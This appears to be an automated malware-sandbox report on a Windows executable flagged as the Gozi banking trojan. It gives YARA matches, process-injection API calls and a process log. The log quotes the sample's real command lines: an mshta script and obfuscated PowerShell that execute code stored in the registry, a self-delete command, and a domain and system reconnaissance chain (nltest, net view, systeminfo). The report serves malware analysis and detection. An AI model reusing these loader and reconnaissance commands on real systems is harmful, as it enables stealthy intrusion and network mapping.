Source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_004015CB GetProcAddress,NtCreateSection,memset, 0_2_004015CB
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0040182B NtMapViewOfSection, 0_2_0040182B
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00401673 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_00401673
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_007541C8 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_007541C8
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076D196 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 0_2_0076D196
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075AA0B NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_0075AA0B
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075B433 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_0075B433
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00751402 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_00751402
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00768E68 NtQueryInformationProcess, 0_2_00768E68
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076E897 NtQuerySystemInformation,RtlNtStatusToDosError, 0_2_0076E897
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00754153 NtGetContextThread,RtlNtStatusToDosError, 0_2_00754153
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076411F OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,CloseHandle, 0_2_0076411F
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0077027B NtQueryInformationProcess, 0_2_0077027B
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00754A69 memset,NtQueryInformationProcess, 0_2_00754A69
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075624E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 0_2_0075624E
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076BB1B OpenProcess,NtQueryInformationProcess, 0_2_0076BB1B
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_007523FC memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_007523FC
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00752BC2 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_00752BC2
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_007684EA NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_007684EA
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075BDCE OpenProcess,OpenProcess,TerminateProcess,NtSuspendProcess,OpenProcess,CloseHandle,NtResumeProcess,CloseHandle, 0_2_0075BDCE
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00753F26 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_00753F26
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075BF83 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0075BF83
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0302AA0B NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 35_2_0302AA0B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0303D196 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 35_2_0303D196
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03038E68 NtQueryInformationProcess, 35_2_03038E68
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0303BB1B NtQueryInformationProcess, 35_2_0303BB1B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03022BC2 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 35_2_03022BC2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03024A69 memset,NtQueryInformationProcess, 35_2_03024A69
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0304027B NtQueryInformationProcess, 35_2_0304027B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0303411F OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,CloseHandle, 35_2_0303411F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0303E897 NtQuerySystemInformation,RtlNtStatusToDosError, 35_2_0303E897
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0302BDCE TerminateProcess,NtSuspendProcess,CloseHandle,NtResumeProcess,CloseHandle, 35_2_0302BDCE
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3E73BC NtQueryInformationProcess,RtlDeleteBoundaryDescriptor, 41_2_000001CEDB3E73BC
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB40B934 NtWriteVirtualMemory, 41_2_000001CEDB40B934
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3E2950 NtQueryInformationToken,NtQueryInformationToken, 41_2_000001CEDB3E2950
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB4088C8 NtSetContextThread,NtUnmapViewOfSection, 41_2_000001CEDB4088C8
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3E5F64 NtQueryInformationProcess, 41_2_000001CEDB3E5F64
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB4057D8 NtCreateSection, 41_2_000001CEDB4057D8
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3F94A8 NtMapViewOfSection, 41_2_000001CEDB3F94A8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA9A10 NtReadVirtualMemory, 62_2_0000019933FA9A10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F92950 NtQueryInformationToken,NtQueryInformationToken,NtClose, 62_2_0000019933F92950
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FBB934 NtWriteVirtualMemory, 62_2_0000019933FBB934
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB88C8 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 62_2_0000019933FB88C8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB57D8 NtCreateSection, 62_2_0000019933FB57D8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F95F64 NtQueryInformationProcess, 62_2_0000019933F95F64
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F9F4FC NtAllocateVirtualMemory, 62_2_0000019933F9F4FC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA94A8 NtMapViewOfSection, 62_2_0000019933FA94A8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F973BC RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor, 62_2_0000019933F973BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FCD002 NtProtectVirtualMemory,NtProtectVirtualMemory, 62_2_0000019933FCD002
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F5F64 NtQueryInformationProcess, 67_2_000001FA9D6F5F64
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F2950 NtQueryInformationToken,NtQueryInformationToken,NtClose, 67_2_000001FA9D6F2950
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D72D002 NtProtectVirtualMemory,NtProtectVirtualMemory, 67_2_000001FA9D72D002
Sample file is different than original file name gathered from version info
Source: Lx6.exe, 00000000.00000003.448794487.0000000004094000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Lx6.exe
Source: Lx6.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: 9AF9.bin1.20.dr Binary string: Boot Device: \Device\HarddiskVolume2
Source: classification engine Classification label: mal100.spre.bank.troj.spyw.expl.evad.winEXE@132/40@6/4
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: Lx6.exe ReversingLabs: Detection: 66%
Source: Lx6.exe Virustotal: Detection: 63%
Source: C:\Users\user\Desktop\Lx6.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Lx6.exe C:\Users\user\Desktop\Lx6.exe
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ccqf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ccqf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP"
Source: C:\Users\user\Desktop\Lx6.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "wmic computersystem get domain |more > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\more.com more
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "net view >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\user\WhiteBook.lnk -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup 127.0.0.1 >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "tasklist.exe /SVC >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "driverquery.exe >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA7A.tmp" "c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "net config workstation >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "net view /all /domain >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES501C.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "net view /all >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Users\user\Desktop\Lx6.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline Jump to behavior
